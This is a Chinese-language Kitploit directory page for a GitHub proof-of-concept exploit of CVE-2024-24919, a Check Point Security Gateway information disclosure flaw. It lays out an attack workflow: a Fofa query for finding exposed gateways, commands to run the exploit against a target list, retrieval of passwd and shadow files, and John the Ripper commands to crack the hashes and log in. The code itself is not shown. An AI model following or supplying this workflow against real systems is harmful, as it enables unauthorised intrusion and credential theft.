Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-24919 — POC - CVE-2024–24919 - Check Point 安全网关 | Kitploit
工具/GitHubGitHub/verylazytech/cve-2024-24919
密码破解漏洞分析漏洞利用信息收集渗透测试学习与教育
GitHubverylazytech/cve-2024-24919

CVE-2024-24919

POC - CVE-2024–24919 - Check Point 安全网关

查看仓库
9351年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

Check Point 安全网关信息泄露 - CVE-2024-24919

My Shop Medium Github Buy Me A Coffee

一旦 Check Point 安全网关连接到互联网并启用了远程访问 VPN 或 Mobile Access 软件刀片,攻击者就有可能读取网关上的某些信息。现已提供可缓解此漏洞的安全修复程序。

了解更多 — CVE-2024-24919

免责声明:本概念验证(POC)仅用于教育和道德测试目的。未经事先双方同意,使用此工具攻击目标属违法行为。遵守所有适用的地方、州和联邦法律是最终用户的责任。开发者不承担任何责任,也不对因使用本程序造成的任何误用或损害负责。

开始使用

寻找目标

要寻找潜在目标,请使用 Fofa(类似于 Shodan.io):

  • Fofa 搜索语法:app="Check_Point-SSL-Network-Extender"

Alt text

首先,克隆仓库:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-24919

接下来,选择你的目标,并按以下格式将其添加到 list.txt 文件中:

  • https://ip_address

运行漏洞利用程序:

root@kitploit:~
python3 CVE-2024-24919.py -l list.txt

现在有两种输出结果:

未成功:

Alt text

成功:

Alt text

在找到 passwd 和 shadow 两个文件后,你可以尝试用 JohnTheRipper 破解哈希。运行漏洞利用程序后,你会得到 passwd 和 shadow 两个文件,可以将它们合并为一个文件并尝试破解(我使用了 rockyou.txt,但也可以是任何密码字典):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Alt text

现在,在我们破解哈希之后,就可以登录该用户了!

下载工具